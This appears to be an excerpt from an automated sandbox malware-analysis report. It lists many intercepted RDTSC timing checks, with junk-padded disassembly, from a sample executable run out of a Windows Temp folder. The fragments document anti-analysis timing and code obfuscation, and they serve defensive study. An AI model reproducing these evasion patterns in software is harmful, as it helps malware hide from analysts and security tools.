Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0BCA second address: 54B0BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d jmp 00007F58F53CD38Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ah, CBh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0BEE second address: 54B0C20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax+04h], 00000000h 0x0000000b jmp 00007F58F4C2897Fh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F58F4C28985h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B00C3 second address: 54B00DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD394h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B00DB second address: 54B010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F58F4C2897Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F58F4C28987h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B09E4 second address: 54B0A08 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7138B6BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, ecx 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d jmp 00007F58F53CD38Eh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 mov edi, eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54B0A08 second address: 54B0A61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F58F4C2897Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov eax, ebx 0x00000012 pushfd 0x00000013 jmp 00007F58F4C28981h 0x00000018 add ax, 3476h 0x0000001d jmp 00007F58F4C28981h 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F58F4C2897Eh 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov dl, A3h 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809B0 second address: 54809B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809B4 second address: 54809BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809BA second address: 54809C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809C0 second address: 54809F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov dl, cl 0x00000010 pushad 0x00000011 mov cx, di 0x00000014 mov cx, di 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov eax, edi 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809F4 second address: 54809F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54809F8 second address: 5480A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 mov si, C667h 0x0000000b pop ecx 0x0000000c popad 0x0000000d and dword ptr [eax], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, 0A12B8D6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440345 second address: 5440354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440354 second address: 544036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F4C28984h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544036C second address: 54403C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push edi 0x0000000f mov bl, ah 0x00000011 pop edx 0x00000012 popad 0x00000013 and esp, FFFFFFF8h 0x00000016 pushad 0x00000017 push esi 0x00000018 mov dx, 5996h 0x0000001c pop edx 0x0000001d pushfd 0x0000001e jmp 00007F58F53CD38Ch 0x00000023 add esi, 2003C688h 0x00000029 jmp 00007F58F53CD38Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F58F53CD395h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54403C7 second address: 5440431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28987h 0x00000009 xor eax, 47A6D02Eh 0x0000000f jmp 00007F58F4C28989h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F58F4C28980h 0x0000001b add ch, FFFFFFA8h 0x0000001e jmp 00007F58F4C2897Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 pushad 0x00000029 mov ah, FCh 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440431 second address: 54404A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F58F53CD396h 0x0000000f push eax 0x00000010 jmp 00007F58F53CD38Bh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F58F53CD396h 0x0000001b mov ebx, dword ptr [ebp+10h] 0x0000001e pushad 0x0000001f push ecx 0x00000020 push edx 0x00000021 pop esi 0x00000022 pop edi 0x00000023 mov edi, ecx 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 jmp 00007F58F53CD390h 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov eax, edi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54404A9 second address: 5440541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007F58F4C2897Fh 0x00000017 xchg eax, edi 0x00000018 pushad 0x00000019 call 00007F58F4C28984h 0x0000001e movzx esi, bx 0x00000021 pop edi 0x00000022 call 00007F58F4C2897Ch 0x00000027 push ecx 0x00000028 pop edx 0x00000029 pop eax 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F58F4C2897Ch 0x00000031 xchg eax, edi 0x00000032 pushad 0x00000033 mov edi, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F58F4C28988h 0x0000003d add eax, 1421C308h 0x00000043 jmp 00007F58F4C2897Bh 0x00000048 popfd 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440541 second address: 544058A instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a jmp 00007F58F53CD392h 0x0000000f je 00007F5967CEB43Eh 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F58F53CD38Eh 0x0000001c or eax, 6066F898h 0x00000022 jmp 00007F58F53CD38Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a movzx ecx, dx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544058A second address: 544061C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F58F4C2897Bh 0x00000008 xor ecx, 0015415Eh 0x0000000e jmp 00007F58F4C28989h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F58F4C28983h 0x00000027 sub ecx, 332A5B6Eh 0x0000002d jmp 00007F58F4C28989h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007F58F4C28980h 0x00000039 sbb ax, CEE8h 0x0000003e jmp 00007F58F4C2897Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 544061C second address: 5440622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440622 second address: 5440626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440626 second address: 5440660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5967CEB383h 0x0000000e jmp 00007F58F53CD397h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F58F53CD38Bh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440660 second address: 5440665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440665 second address: 5440687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F58F53CD396h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440687 second address: 5440759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007F58F4C28986h 0x00000014 jne 00007F596754694Ch 0x0000001a pushad 0x0000001b push ecx 0x0000001c pushfd 0x0000001d jmp 00007F58F4C2897Dh 0x00000022 and si, C7D6h 0x00000027 jmp 00007F58F4C28981h 0x0000002c popfd 0x0000002d pop ecx 0x0000002e jmp 00007F58F4C28981h 0x00000033 popad 0x00000034 test byte ptr [esi+48h], 00000001h 0x00000038 pushad 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F58F4C28986h 0x00000040 or cx, 9058h 0x00000045 jmp 00007F58F4C2897Bh 0x0000004a popfd 0x0000004b popad 0x0000004c call 00007F58F4C28988h 0x00000051 jmp 00007F58F4C28982h 0x00000056 pop ecx 0x00000057 popad 0x00000058 jne 00007F59675468CAh 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440759 second address: 5440773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD396h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5440773 second address: 54407BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C28981h 0x00000009 and ax, 4EB6h 0x0000000e jmp 00007F58F4C28981h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test bl, 00000007h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F58F4C28984h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54407BF second address: 54407CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470152 second address: 5470158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470158 second address: 547015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547015C second address: 54701EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, si 0x0000000d pushfd 0x0000000e jmp 00007F58F4C28988h 0x00000013 add esi, 39EA7978h 0x00000019 jmp 00007F58F4C2897Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 mov si, 10CBh 0x00000026 jmp 00007F58F4C28980h 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d jmp 00007F58F4C28980h 0x00000032 push eax 0x00000033 jmp 00007F58F4C2897Bh 0x00000038 xchg eax, esi 0x00000039 jmp 00007F58F4C28986h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 mov ebx, 3F69D980h 0x00000049 mov ecx, edx 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54701EE second address: 5470243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD390h 0x00000008 mov eax, 50F94061h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub ebx, ebx 0x00000012 pushad 0x00000013 mov bh, A1h 0x00000015 pushfd 0x00000016 jmp 00007F58F53CD394h 0x0000001b jmp 00007F58F53CD395h 0x00000020 popfd 0x00000021 popad 0x00000022 test esi, esi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov cx, 92E9h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470243 second address: 5470284 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4E8E74A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dl, cl 0x0000000b popad 0x0000000c je 00007F596750EAB5h 0x00000012 pushad 0x00000013 jmp 00007F58F4C2897Fh 0x00000018 popad 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F58F4C28985h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470284 second address: 5470356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov ax, 0163h 0x00000010 popad 0x00000011 je 00007F5967CB3488h 0x00000017 pushad 0x00000018 mov dh, E3h 0x0000001a push esi 0x0000001b pushfd 0x0000001c jmp 00007F58F53CD393h 0x00000021 xor ch, 0000003Eh 0x00000024 jmp 00007F58F53CD399h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c test byte ptr [77DE6968h], 00000002h 0x00000033 jmp 00007F58F53CD397h 0x00000038 jne 00007F5967CB3440h 0x0000003e pushad 0x0000003f jmp 00007F58F53CD394h 0x00000044 call 00007F58F53CD392h 0x00000049 mov ecx, 02359761h 0x0000004e pop esi 0x0000004f popad 0x00000050 mov edx, dword ptr [ebp+0Ch] 0x00000053 pushad 0x00000054 mov eax, edi 0x00000056 mov eax, ebx 0x00000058 popad 0x00000059 push ebp 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F58F53CD398h 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470356 second address: 5470365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470365 second address: 54703AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c jmp 00007F58F53CD38Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov eax, 0FEF4B3Dh 0x00000018 jmp 00007F58F53CD38Ah 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push esi 0x00000023 pop ebx 0x00000024 mov bx, cx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703AF second address: 54703E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F58F4C2897Bh 0x00000009 xor esi, 105541DEh 0x0000000f jmp 00007F58F4C28989h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703E0 second address: 54703EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54703EE second address: 54703F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547043F second address: 5470454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470454 second address: 547045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547045A second address: 5470483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d movzx eax, bx 0x00000010 mov edi, 6885B6D4h 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 5470483 second address: 547049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ch, bh 0x00000007 popad 0x00000008 mov esp, ebp 0x0000000a jmp 00007F58F4C2897Ah 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 547049E second address: 54704BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54704BB second address: 54704C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54704C1 second address: 54704C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600A5 second address: 54600C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600C9 second address: 54600CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600CF second address: 54600D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54600D3 second address: 54600D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D081D second address: 54D0823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0823 second address: 54D0828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0828 second address: 54D083C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, FEABh 0x00000007 mov si, DA87h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D083C second address: 54D0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54D0844 second address: 54D08C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cl, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F58F4C2897Bh 0x00000012 adc eax, 7E7291FEh 0x00000018 jmp 00007F58F4C28989h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F58F4C2897Fh 0x00000029 and ecx, 68D5E40Eh 0x0000002f jmp 00007F58F4C28989h 0x00000034 popfd 0x00000035 call 00007F58F4C28980h 0x0000003a pop ecx 0x0000003b popad 0x0000003c rdtsc
